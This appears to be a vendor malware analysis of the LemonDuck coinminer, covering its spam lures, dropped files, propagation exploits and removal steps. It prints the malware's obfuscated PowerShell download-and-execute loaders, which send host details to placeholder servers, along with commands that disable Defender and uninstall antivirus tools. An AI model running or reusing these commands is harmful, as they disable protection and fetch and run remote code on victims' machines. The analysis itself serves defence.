Fileless.LEMONDUCK

Publish Date: 06 Mai 2021

Analyse von: Arianne Grace Dela Cruz

Trojan-Dropper.PowerShell.Compressed.b (KASPERSKY); Trojan.PowerShell.Crypt (IKARUS)

Plattform:

Windows, Linux

Risikobewertung (gesamt):

Schadenspotenzial::

Verteilungspotenzial::

reportedInfection:

Trend Micro Lösungen:

Niedrig

Mittel

Hoch

Kritisch

Malware-Typ:
Coinminer
Zerstrerisch?:
Nein
Verschlsselt?:
Nein
In the wild::
Ja

Überblick

Infektionsweg: Spam-Versand per E-Mail, Verbreitet sich über Sicherheitslücken in Software

Wird als Spam-Mail-Anhang durch andere Malware/Grayware/Spyware oder bösartige Benutzer übertragen.

Nutzt Software-Schwachstellen aus, um sich auf andere Computer in einem Netzwerk zu verbreiten.

Anschließend werden die heruntergeladenen Dateien ausgeführt. Dadurch können die bösartigen Routinen der heruntergeladenen Dateien auf dem betroffenen System aktiv werden.

Sammelt bestimmte Informationen auf dem betroffenen Computer.

Technische Details

Dateigröße: 3,845 bytes

Dateityp: PS1

Speicherresiden: Nein

Erste Muster erhalten am: 28 April 2021

Schadteil: Encrypts files, Collects system information, Connects to URLs/IPs, Downloads files, Drops files

Übertragungsdetails

Er kommt als Anhang an folgende E-Mail-Nachrichten durch andere Malware verbreitet Grayware / Spyware oder böswillige Benutzer:

Where Email Subject - Message Body can be any of the following combinations:
- The Truth of COVID-19 - Virus actually comes from United States of America
- COVID-19 nCov Special info WHO - very important infomation for Covid-19 see attached document for your action and discretion.
- HALTH ADVISORY:CORONA VIRUS - the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future. see attached document for your action and discretion.
- WTF - what's wrong with you?are you out of your mind!!!!!
- What the fcuk - are you out of your mind!!!!!what 's wrong with you?
- good bye - good bye, keep in touch
- farewell letter - good bye, keep in touch
- broken file - can you help me to fix the file,i can't read it
- This is your order? - file is brokened, i can't open it

Installation

Schleust die folgenden Dateien ein:

{Removable/Network Drive name}\Dblue3.lnk
{Removable/Network Drive name}\Eblue3.lnk
{Removable/Network Drive name}\Fblue3.lnk
{Removable/Network Drive name}\Gblue3.lnk
{Removable/Network Drive name}\Hblue3.lnk
{Removable/Network Drive name}\Iblue3.lnk
{Removable/Network Drive name}\Jblue3.lnk
{Removable/Network Drive name}\Kblue3.lnk
{Removable/Network Drive name}\Dblue6.lnk
{Removable/Network Drive name}\Eblue6.lnk
{Removable/Network Drive name}\Fblue6.lnk
{Removable/Network Drive name}\Gblue6.lnk
{Removable/Network Drive name}\Hblue6.lnk
{Removable/Network Drive name}\Iblue6.lnk
{Removable/Network Drive name}\Jblue6.lnk
{Removable/Network Drive name}\Kblue6.lnk
{Removable/Network Drive name}\readme.js
{Removable/Network Drive name}\UTFsync\inf_data - serves as infection marker
Some LemonDuck variants deployed via the ProxyLogon vulnerability can drop the following files:
- %System%\inetpub\wwwroot\aspnet_client\js\demo\wanlin.txt
- %System%\inetpub\wwwroot\aspnet_client\js\demo\wanlins.aspx - Chopper Webshell

Schleust die folgenden Dateien ein und führt sie aus:

%User Temp%\tt.vbs - install scheduled task to execute kk4kk.log (detected as HackTool.Win32.Mpacket.SM)
%System%\WindowsPowerShell\v1.0\{Random}.exe - legitimate copy of Powershell.exe

(Hinweis: %User Temp% ist der Ordner 'Temp' des aktuellen Benutzers, normalerweise C:\Dokumente und Einstellungen\{Benutzername}\Lokale Einstellungen\Temp unter Windows 2000(32-bit), XP und Server 2003(32-bit) und C:\Users\{Benutzername}\AppData\Local\Temp unter Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) und 10(64-bit).. %System% ist der Windows Systemordner. Er lautet in der Regel C:\Windows\System unter Windows 98 und ME, C:\WINNT\System32 unter Windows NT und 2000 sowie C:\Windows\System32 unter Windows 2000(32-bit), XP, Server 2003(32-bit), Vista, 7, 8, 8.1, 2008(64-bit), 2012(64bit) and 10(64-bit).)

Fügt die folgenden Prozesse hinzu:

cmd /c start /b notepad "+{Malware file name}+" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('{Download URL}7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('{Download URL}mail.jsp?js_0.7')"
cmd /c echo Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden
ComputerDefaults.exe - if ran in Windows 10
CompMgmtLauncher.exe - if ran in other OS
To uninstall antivirus related programs:
- cmd /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
- cmd /c "C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe" /verysilent /suppressmsgboxes /norestart
To open ports:
- cmd.exe /c netsh.exe firewall add portopening tcp 65529 SDNSd
- netsh.exe interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53
- netsh advfirewall firewall add rule name="deny445" dir=in protocol=tcp localport=445 action=block
- netsh advfirewall firewall add rule name="deny135" dir=in protocol=tcp localport=135 action=block
cmd.exe /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='9f9075b6db0089161c96cabf65974fa3';$ifp=$env:tmp+'\kr.bin';$down_url='{Download URL}';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?^^^&{Computer Name}^^^&{Gathered information}^^^&{MAC Address}');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|{Random}.exe -
cmd.exe /c echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='144f3ede7ec9d604a58113fc91a246d1';$ifp=$env:tmp+'\if.bin';$down_url='{Download URL}';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/if.bin?^^^&{Computer Name}^^^&{Gathered information}^^^&{MAC Address}');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|{Random}.exe -
For 64bit machines:
- cmd.exe /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\elocalTMn',[ref]$localKr)}catch{};$ifmd5='4001ba98a424fdb63047a23af97ec590';$ifp=$env:tmp+'\m6.bin';$down_url='{Download URL}';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^^^&{Computer Name}^^^&{Gathered information}^^^&{MAC Address}');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|{Random}.exe -
For 64bit machines and video card is any of the following: {GTX, NVIDIA, GEFORCE, Radeon, AMD}
- cmd.exe /c echo try{$localTMng=$flase;New-Object Threading.Mutex($true,'Global\elocalTMng',[ref]$localKr)}catch{};$ifmd5='a921b532d5d239e4a2e71e5f853195cd';$ifp=$env:tmp+'\m6g.bin';$down_url='{Download URL}';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6g.bin?^^^&{Computer Name}^^^&{Gathered information}^^^&{MAC Address}');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|{Random}.exe -
Some variants of LemonDuck execute the following:
- Add users and local groups:
- Delete AV related firewall rules:
- Delete AV related services:
- powershell.exe -psconsolefile "$env:exchangeinstallpath\bin\exshell.psc1" -command "New-ManagementRoleAssignment –Role 'Mailbox Import Export' –User netcat"
- REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
- wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

Erstellt die folgenden Ordner:

Variants of LemonDuck deployed via ProxyLogon Vulnerability can create the following folders:
- %System%\inetpub\wwwroot\aspnet_client\js\demo
- {Exchange server installation path}\Frontend\HttpProxy\ecp\auth\js\demo

Andere Systemänderungen

Ändert die folgenden Registrierungseinträge:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\LanmanServer\Parameters
DisableCompression = 1

HKEY_CURRENT_USER\Software\Classes\
ms-settings\shell\open\
command
DelegateExecute = {Null}

HKEY_CURRENT_USER\Software\Classes\
ms-settings\shell\open\
command
(default) = cmd /c echo Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden & Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')

HKEY_CURRENT_USER\Software\Classes\
mscfile\shell\open\
command
DelegateExecute = {Null}

HKEY_CURRENT_USER\Software\Classes\
mscfile\shell\open\
command
(default) = cmd /c powershell -w hidden Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')

Verbreitung

Nutzt die folgenden Software-Schwachstellen aus, um sich auf andere Computer in einem Netzwerk zu verbreiten:

SMB request - Eternal Blue Exploit (CVE-2017-0144)
- Upon exploitation, it may perform the following:
  - Execute the following command: cmd /c schtasks /create /ru system /sc MINUTE /mo 120 /tn Rtsa /tr "powershell -c '\\"{Download URL 1}\\",\\"{Download URL 2}\\",\\"{Download URL 2}\\"|foreach{I`EX(Ne`w-Obj`ect Net.WebC`lient).\\"DownloadString\\"(\\"http://$_/ebo.jsp?0.9*$env:username*$env:computername\\")}'" /F & echo %path%|findstr /i powershell>nul || (setx path "%path%;c:\windows\system32\WindowsPowershell\v1.0" /m) & schtasks /run /tn Rtsa
  - Install the following scheduled task:
SMBGhost vulnerability
- Upon exploitation, it executes the following command:
RDP Brute-Forcing
SSH brute-forcing
- Upon exploitation, it may execute the following:
Pass-the-hash Attack
- Uses PowerDump module and Mimikatz to dump Username, password, NTLM hashes, and domain information of the target machine.
MS-SQL brute-forcing
- Upon successful brute-forcing, it will add a malware detected as HackTool.Win32.EvilCLR.YXBCIA to the database server to enable the execution of the following: "powershell.exe iex(new-object net.webclient).downloadstring('{Download URL}/if.bin?once')"
- It scans for vulnerable MS-SQL port 1433. Upon exploitation, it will execute the following commands:
Redis remote command
- Upon scanning for vulnerable port 6379, 16379, it may perform the following command:
Yarn remote command
- Upon scanning for vulnerable port 8088, it may perform the following command:
Logic Port Scan
- Upon scanning for vulnerable port 7001, it may perform the following command:
Vulnerable networks in port 445
- Upon exploiting vulnerable networks connecting to port 445, it does the following:

(Hinweis: %System% ist der Windows Systemordner. Er lautet in der Regel C:\Windows\System unter Windows 98 und ME, C:\WINNT\System32 unter Windows NT und 2000 sowie C:\Windows\System32 unter Windows 2000(32-bit), XP, Server 2003(32-bit), Vista, 7, 8, 8.1, 2008(64-bit), 2012(64bit) and 10(64-bit).. %User Startup% ist der Ordner 'Autostart' des aktuellen Benutzers, normalerweise C:\Windows\Profile\{Benutzername}\Startmenü\Programme\Autostart unter Windows 98 und ME, C:\WINNT\Profile\{Benutzername}\Startmenü\Programme\Autostart unter Windows NT, C:\Documents and Settings\{Benutzername}\Startmenü\Programme\Autostart unter Windows 2003(32-bit), XP und 2000(32-bit) und C:\Users\{Benutzername}\AppData\Roaming\Microsoft\Windows\Startmenü\Programme\Autostart unter Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) und 10(64-bit).)

Prozessbeendigung

Beendet die folgenden Dienste, wenn sie auf dem betroffenen System gefunden werden:

.Net CLR
\gm
360rTys
ALGM
aspnet_staters
AxInstSV
ClipBooks
CLR
clr_optimization
DNS Server
ExpressVNService
IPSECS
lsass
Microsoft
Microsoft Telemetry
MpeSvc
mssecsvc2.0
mssecsvc2.1
Natimmonal
Nationaaal
National
Nationalaie
Nationalmll
Nationaloll
Nationalwpi
NetMsmqActiv Media NVIDIA
Oracleupdate
RpcEptManger
Samserver
Serhiez
Sncryption Media Playeq
Sougoudl
SRDSL
SuperProServer
SvcNlauser
SVSHost
SxS
sysmgt
system
taskmgr1
WebServers
WifiService
Windows Managers
Windows_Update
WinHasdadelp32
WinHasdelp32
WinHelp32
WinHelp64
WinHelpSvcs
WinSvc
WinVaultSvc
WissssssnHelp32
WmdnPnSN
wmiApServs
wmiApSrvs
WWW.{BLOCKED}S.CN.COM
Xtfy
Xtfya
Xtfyxxx
xWinWpdSrv
Zational

Beendet Prozesse oder Dienste, die einen oder mehrere dieser Zeichenfolgen enthalten, wenn sie im Speicher des betroffenen Systems ausgeführt werden:

360
8866
9696
9797
9966
auto-upgeade
Avira
Calligrap
cara
Carbon
carss
cohernece
conhoste
csrsc
DW20
explores
Galligrp
gxdrv
Imaging
javaupd
lsmosee
minerd
MinerGate
msinfo
ress
SC
SearchIndex
secuams
service
Setring
Setting
Sqlceqp
SQLEXPRESS_X64_86
SQLforwin
svchosti
svshost
SystemIIS
SystemIISSec
taskegr
taskmgr1
Terms.EXE
Uninsta
update
upgeade
WerFault
WerMgr
win
WindowsDefender*
WindowsUpdater*
Workstation
xig*
XMR*
xmrig*
yamm1
360bdoctor.exe
360rp.exe
360rps.exe
360safe_cq.exe
360safe_se.exe
360sd.exe
360speedld.exe
360Tray.exe
360LogCenter.exe
360tray.exe
360speedld.exe
360se.exe

Einschleusungsroutine

Nutzt die folgenden Software-Schwachstellen, um bösartige Dateien einzuschleusen:

Windows LNK Remote Code Execution Vulnerability (CVE-2017-8464) - Dropped in removable drives to allow execution of remote commands.

Download-Routine

Speichert die heruntergeladenen Dateien unter den folgenden Namen:

%User Temp%\m6.bin - Modified XMRig for 64bit Machines
%User Temp%\m6g.bin - Coinminer for 64bit Machines and video card name has the one of the following strings:"GTX","NVIDIA","GEFORCE","Radeon","AMD"
%User Temp%\kr.bin - Kill Competitions Module
%User Temp%\if.bin - Propagation and Exploitation Module
%User Temp%\if_mail.bin - Email Spreader Module
%User Temp%\ode.bin - Downloads PowerSploit module and create scheduled task
%User Temp%\nvd.zip - Coinminer for 64bit Machines and video card name has the one of the following strings:"GTX","NVIDIA","GEFORCE","Radeon","AMD"
%User Temp%\mimi.dat - Mimikatz module
Modules for Process Termination, Task and WMI installation:
- %User Temp%\mso.jsp
- %User Temp%\ms.jsp
- %User Temp%\rdp.jsp
- %User Temp%\rdpo.jsp
- %User Temp%\smgh.jsp
- %User Temp%\smgho.jsp
- %User Temp%\logic.jsp
- %User Temp%\logico.jsp

Anschließend werden die heruntergeladenen Dateien ausgeführt. Dadurch können die bösartigen Routinen der heruntergeladenen Dateien auf dem betroffenen System aktiv werden.

Datendiebstahl

Sammelt die folgenden Informationen auf dem betroffenen Computer:

Machine Type (32bit or 64bit)
Computer Name
Product UUID
Mac Address
Operating system
User name
Machine Domain
System uptime
Video Controller name
Physical memory
Drive information:
- Drive Type
- Free space
- Drive format
Time stamp
JavaScript information on localhost
Host Name
Coinminer version - if a coinminer is present
Ip address - if a coinminer is present
Total hashrate - if a coinminer is present
First 6 bytes of md5 hashes of malicious files

Andere Details

Es macht Folgendes:

It adds the following Windows Management
Infection Marker:

__EventFilter

Name: blackball

Persistence:

__EventFilter

Name: {Random}

CommandLineEventConsumer

Name: {Random}
Command: powershell -w hidden -c function a($u){$d=(Ne`w-Obj`ect
__FilterToConsumerBinding

It disables Windows Defender Real Time Monitoring. It excludes Powershell.exe running in C:\ directory in Windows
http://t.{BLOCKED}g.com
http://t.{BLOCKED}9.com
http://t.{BLOCKED}x.com
http://t.{BLOCKED}q.com
http://d.{BLOCKED}p.com
http://t.{BLOCKED}1.com
http://t.{BLOCKED}0.com
http://down.{BLOCKED}cat.com
http://t.{BLOCKED}kit.com
http://t.{BLOCKED}kit.com
http://d.{BLOCKED}g.com
http://p.{BLOCKED}q.com
http://lplp.{BLOCKED}g.com
http://w.{BLOCKED}0.com
http://info.{BLOCKED}x.com
http://info.{BLOCKED}g.com
http://info.{BLOCKED}0.com
http://t.{BLOCKED}q.top
http://p.{BLOCKED}a.com
http://t.{BLOCKED}2.com
http://t.{BLOCKED}q.com
http://ps2.{BLOCKED}ihua
http://t.{BLOCKED}n.com
http://t.{BLOCKED}r.cc
http://t.{BLOCKED}0.sh
http://t.{BLOCKED}cat.co
http://d.{BLOCKED}8.ag
{BLOCKED}.{BLOCKED}.154.202
{BLOCKED}.{BLOCKED}.7.85
{BLOCKED}.{BLOCKED}.43.37
{BLOCKED}.{BLOCKED}.225.82
{BLOCKED}.{BLOCKED}.107.193
{BLOCKED}.{BLOCKED}.80.221
{BLOCKED}.{BLOCKED}.183.160
{BLOCKED}.{BLOCKED}.188.255
{BLOCKED}.{BLOCKED}.158.207

Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('{Base64 encoded command}');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='{Download URL}';a($url+'/a.jsp?mail_20210428?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))

It will only modify "HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command" if the OS is Windows 10. Otherwise, the registry "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" will be modified.
It deletes the following scheduled tasks:
- /Rtsa
- /Rtsa1
- /Rtsa2
- AdobeFlashPlayer
- Bluetooths
- Credentials
- Ddrivers
- DNS
- DnsCore
- DnsCore
- DnsScan
- ECDnsCore
- Flash
- FlashPlayer1
- FlashPlayer2
- FlashPlayer3
- gm
- GooglePingConfigs
- HispDemorn
- HomeGroupProvider
- IIS
- LimeRAT-Admin
- Microsoft Telemetry
- Miscfost
- MiscfostNsi
- my1
- Mysa
- Mysa1
- Mysa2
- Mysa3
- Netframework
- ngm
- ok
- Oracle Java
- Oracle Java Update
- Oracle Products Reporter
- RavTask
- skycmd
- Sorry
- Spooler SubSystem Service
- System Log Security Check
- SYSTEM"qPt,"DNS2
- SYSTEMa
- TablteInputout
- Update
- Update qPtservice for Windows Service
- Update service for products
- Update_windows
- Update1
- Update2
- Update3
- Update4
- WebServers
- werclpsyport
- Windows_Update
- WindowsLogTasks
- WindowsUpdate1
- WindowsUpdate2
- WindowsUpdate3
- WwANsvc
It check the presence of Outlook and Outlook\Security in the following registry keys:
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Office
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Office
If present, it will modify the registry entry:
{Registry Key from list above}
ObjectModelGuard = 2
It uses any of the following {Download URL} to send gathered information, as well as download related modules:
- http://t.{BLOCKED}9.com
It sets the machine's DNS server to Google (8.8.8.8 or 9.9.9.9)
It uses the following credentials for brute-forcing:
- Username:
- Passwords:
- NTLM Hashes:
It sends copies of itself as zip attachment to email addresses gathered from the victim machine's Outlook contacts, inbox and sent items. It would delete the emails it sent from the sent items folder.
It tries to connect to the named pipe \.\pipe\HHyeuqi7\ and execute its email propagation module.
It terminates processes connecting to the following domains:
- pg.{BLOCKED}q.com
- p.{BLOCKED}q.com
- pg.{BLOCKED}4.com
- p.{BLOCKED}4.com
- lplp.{BLOCKED}g.com
It terminates processes that established a TCP connection to the following ports:
- 1111
- 2222
- 3333
- 4444
- 5555
- 6666
- 7777
- 8888
- 9999
- 14433
- 14444
- 43669
- 43668
- 45560
- 65333

Lösungen

Mindestversion der Scan Engine: 9.800

Erste VSAPI Pattern-Datei: 15.932.08

Erste VSAPI Pattern veröffentlicht am: 07 Mai 2020

VSAPI OPR Pattern-Version: 15.933.00

VSAPI OPR Pattern veröffentlicht am: 08 Mai 2020

Step 1

Für Windows ME und XP Benutzer: Stellen Sie vor einer Suche sicher, dass die Systemwiederherstellung deaktiviert ist, damit der gesamte Computer durchsucht werden kann.

Step 2

<p> Beachten Sie, dass nicht alle Dateien, Ordner, Registrierungsschlüssel und Einträge auf Ihrem Computer installiert sind, während diese Malware / Spyware / Grayware ausgeführt wird. Dies kann auf eine unvollständige Installation oder andere Betriebssystembedingungen zurückzuführen sein. Fahren Sie mit dem nächsten Schritt fort. </ p><p> Beachten Sie, dass nicht alle Dateien, Ordner, Registrierungsschlüssel und Einträge auf Ihrem Computer installiert sind, während diese Malware / Spyware / Grayware ausgeführt wird. Dies kann auf eine unvollständige Installation oder andere Betriebssystembedingungen zurückzuführen sein. Fahren Sie mit dem nächsten Schritt fort. </ p>

Step 3

Im abgesicherten Modus neu starten

[ learnMore ]

Step 4

Restore this modified registry value

[ learnMore ]

Important: Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this only if you know how to or you can seek your system administrator’s help. You may also check out this Microsoft article first before modifying your computer's registry.

In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
- DisableCompression = 1
- DisableCompression = {Default}
In HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command
- DelegateExecute = {Null}
- DelegateExecute = {Default}
In HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command
- (default) = cmd /c echo Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden & Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')
- (default) = {Default}
In HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command
- DelegateExecute = {Null}
- DelegateExecute = {Default}
In HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command
- (default) = cmd /c powershell -w hidden Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')
- (default) = {Default}
- {Registry Key in Outlook\Security in the list mentioned}
- ObjectModelGuard = 2
- ObjectModelGuard = {Default}

Step 5

Deleting Scheduled Tasks

The following {Task Name} - {Task to be run} listed should be used in the steps identified below:

Rtsa - \"{Download URL 1}\",\"{Download URL 2}\",\"{Download URL 2}\"|foreach{I`EX(Ne`w-Obj`ect Net.WebC`lient).\"DownloadString\"(\"http://$_/ebo.jsp?0.9*$env:username*$env:computername\")}"
blackball - blackball
{random} - powershell -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('{Base64 encoded command}');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='{Download URL}';a($url+'/a.jsp?mail_20210428?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))

For Windows 2000, Windows XP, and Windows Server 2003:

Open the Windows Scheduled Tasks. Click Start>Programs>Accessories>
System Tools>Scheduled Tasks.
Locate each {Task Name} values listed above in the Name column.
Right-click on the said file(s) with the aforementioned value.
Click on Properties. In the Run field, check for the listed {Task to be run}.
If the strings match the list above, delete the task.

For Windows Vista, Windows 7, Windows Server 2008, Windows 8, Windows 8.1, and Windows Server 2012:

Open the Windows Task Scheduler. To do this:
• On Windows Vista, Windows 7, and Windows Server 2008, click Start, type taskschd.msc in the Search input field, then press Enter.
• On Windows 8, Windows 8.1, and Windows Server 2012, right-click on the lower left corner of the screen, click Run, type taskschd.msc, then press Enter.
In the left panel, click Task Scheduler Library.
In the upper-middle panel, locate each {Task Name} values listed above in the Name column.
In the lower-middle panel, click the Actions tab. In the Details column, check for the {Task to be run} string.
If the said string is found, delete the task.

Step 6

Diese Dateien suchen und löschen

[ learnMore ]

Möglicherweise sind einige Komponentendateien verborgen. Aktivieren Sie unbedingt das Kontrollkästchen Versteckte Elemente durchsuchen unter "Weitere erweiterte Optionen", um alle verborgenen Dateien und Ordner in den Suchergebnissen zu berücksichtigen.

{Removable/Network Drive name}\Dblue3.lnk
{Removable/Network Drive name}\Eblue3.lnk
{Removable/Network Drive name}\Fblue3.lnk
{Removable/Network Drive name}\Gblue3.lnk
{Removable/Network Drive name}\Hblue3.lnk
{Removable/Network Drive name}\Iblue3.lnk
{Removable/Network Drive name}\Jblue3.lnk
{Removable/Network Drive name}\Kblue3.lnk
{Removable/Network Drive name}\Dblue6.lnk
{Removable/Network Drive name}\Eblue6.lnk
{Removable/Network Drive name}\Fblue6.lnk
{Removable/Network Drive name}\Gblue6.lnk
{Removable/Network Drive name}\Hblue6.lnk
{Removable/Network Drive name}\Iblue6.lnk
{Removable/Network Drive name}\Jblue6.lnk
{Removable/Network Drive name}\Kblue6.lnk
{Removable/Network Drive name}\readme.js
{Removable/Network Drive name}\UTFsync\inf_data
%System%\inetpub\wwwroot\aspnet_client\js\demo\wanlin.txt
%System%\inetpub\wwwroot\aspnet_client\js\demo\wanlins.aspx
%User Temp%\tt.vbs
%User Temp%\m6.bin
%User Temp%\m6g.bin
%User Temp%\kr.bin
%User Temp%\if.bin
%User Temp%\if_mail.bin
%User Temp%\ode.bin
%User Temp%\nvd.zip
%User Temp%\mimi.dat
%User Temp%\mso.jsp
%User Temp%\ms.jsp
%User Temp%\rdp.jsp
%User Temp%\rdpo.jsp
%User Temp%\smgh.jsp
%User Temp%\smgho.jsp
%User Temp%\logic.jsp
%User Temp%\logico.jsp
{Malware Path}\dn.ps1
{Malware Path}\m6.exe
{Malware Path}\svchost.dat

DATA_GENERIC_FILENAME_1

Wählen Sie im Listenfeld lt;i>Suchen in die Option Arbeitsplatz, und drücken Sie die Eingabetaste.

Markieren Sie die gefundene Datei, und drücken Sie UMSCHALT+ENTF, um sie endgültig zu löschen.

Wiederholen Sie die Schritte 2 bis 4 für die übrigen Dateien:
{Removable/Network Drive name}\Dblue3.lnk
{Removable/Network Drive name}\Eblue3.lnk
{Removable/Network Drive name}\Fblue3.lnk
{Removable/Network Drive name}\Gblue3.lnk
{Removable/Network Drive name}\Hblue3.lnk
{Removable/Network Drive name}\Iblue3.lnk
{Removable/Network Drive name}\Jblue3.lnk
{Removable/Network Drive name}\Kblue3.lnk
{Removable/Network Drive name}\Dblue6.lnk
{Removable/Network Drive name}\Eblue6.lnk
{Removable/Network Drive name}\Fblue6.lnk
{Removable/Network Drive name}\Gblue6.lnk
{Removable/Network Drive name}\Hblue6.lnk
{Removable/Network Drive name}\Iblue6.lnk
{Removable/Network Drive name}\Jblue6.lnk
{Removable/Network Drive name}\Kblue6.lnk
{Removable/Network Drive name}\readme.js
{Removable/Network Drive name}\UTFsync\inf_data
%System%\inetpub\wwwroot\aspnet_client\js\demo\wanlin.txt
%System%\inetpub\wwwroot\aspnet_client\js\demo\wanlins.aspx
%User Temp%\tt.vbs
%User Temp%\m6.bin
%User Temp%\m6g.bin
%User Temp%\kr.bin
%User Temp%\if.bin
%User Temp%\if_mail.bin
%User Temp%\ode.bin
%User Temp%\nvd.zip
%User Temp%\mimi.dat
%User Temp%\mso.jsp
%User Temp%\ms.jsp
%User Temp%\rdp.jsp
%User Temp%\rdpo.jsp
%User Temp%\smgh.jsp
%User Temp%\smgho.jsp
